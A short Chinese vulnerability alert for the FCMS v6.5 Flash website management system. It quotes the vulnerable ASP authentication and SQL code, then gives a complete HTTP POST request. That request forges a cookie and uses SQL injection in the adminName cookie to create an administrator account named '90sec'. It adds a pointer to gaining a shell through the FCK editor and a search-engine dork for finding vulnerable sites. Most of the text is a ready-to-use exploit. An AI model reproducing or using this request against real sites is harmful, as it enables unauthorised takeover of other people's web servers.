追梦Flash网站管理系统FCMS v6.5 漏洞漏洞预警 -电脑资料

    Author:roker

    xmlEditor/adminadd.asp

    <%

    if request.cookies("key")<>"super" then

    response.Write("")

    Response.End

    end if

    %>

    chkuser.asp

    <%

    set urs=server.createobject("adodb.recordset")

    sql="select * from xmlAdmin where adminName='"&Request.cookies("adminName")&"'"

    urs.open sql,conn,1,3

    if urs.bof or urs.eof then

    response.redirect "login.asp"

    response.end

    end if

    urs.close

    set urs=nothing

    %>

    提交

    Host: xxx.com

    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2) Gecko/20100115 Firefox/3.6

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Accept-Language: zh-cn,zh;q=0.5

    Accept-Encoding: gzip,deflate

    Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7

    Keep-Alive: 115

    Connection: keep-alive

    Referer: http://xxx/xmlEditor/adminadd.asp

    Cookie: key=super;adminName='%09or '1;

    Content-Type: application/x-www-form-urlencoded

    Content-Length: 91

    adminName=90sec&OSKEY=videos&newPwd=90sec&newPwd2=90sec&fullname=90sec&email=90sec%40qq.com

    添加账号密码为90sec的用户 = =

    后台 fck编辑器 拿shell

    关键字，

追梦Flash网站管理系统FCMS v6.5 漏洞漏洞预警

电脑资料

    inurl:"server.asp?flowNo="